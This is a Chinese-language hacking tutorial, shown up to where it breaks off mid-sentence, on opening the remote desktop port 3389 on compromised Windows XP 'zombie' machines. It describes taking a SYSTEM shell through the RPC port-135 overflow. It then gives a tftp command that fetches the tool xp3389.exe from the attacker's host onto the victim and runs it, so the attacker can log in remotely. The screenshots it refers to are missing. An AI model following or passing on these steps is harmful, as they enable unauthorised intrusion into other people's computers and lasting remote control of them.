知道对方密码如果开XP的3389端口(远程)

windows xp发布到现在已经几年了。但是它一直似乎是牢不可破的。以前也有过一些关于windows xp的溢出但是基本没人成功过。一直到了最近闹的沸沸扬扬的Microsoft RPC接口远程任意代码可执行漏洞才打破了这个神话。但是对于windows xp这个系统我个人认为安全系数还是比较高的。推荐个人使用。

今天我主要要为大家讲的是windows xp的Terminal Services服务。该服务使用的端口是tcp 3389端口。所以开Terminal Services服务的肉鸡大家就习惯管他叫3389鸡。想必大家都玩过win2k的3389吧？但是我最近去了一些论坛有很多人说windows xp的Terminal Services和windows 2000的是一样的。具我的多次实验发现windows xp的3389和windows 2000的3389根本不是一样的而且差的很多。下面我就为大家详细讲解一下windows xp的3389。首先要想清楚看见windows xp的3389就要先开启windows xp的3389。我在网上发现了一个针对开启windows xp3389的小工具。具我多次实验100%可以成功。该工具的名字为
xp3389.exe而且使用也非常简便。直接上传到肉鸡上执行就可以了。由于xp的ipc$默认只是guest权限。用ipc$的思路上传文件是绝对错误的。我归纳出上传文件的方法有两种：

1 利用tftp上传（tftp大家都很熟悉吧？以前提到过N次在这里我就不详细说了）
2 利用ftp来上传
首先我先用时下比较前卫的漏洞135端口的rpc漏洞溢出一台windows xp主机详细看下图：

OK。一举成功。拿到了一个system权限的shell.然后用tftp上传xp3389.exe命令为tftp –I ip get xp3389.exe看下图：

OK上传完毕。然后直接在肉鸡执行就可以了。看下图：

执行完毕以后就成功开启了3389服务。（该程序最大的好处就是执行以后不需要肉鸡重新启动就可以直接登陆。）
对了还有一个问题我要先象大家交代要想登陆xp的3389必须要使用系统没占用的帐号。也就是现在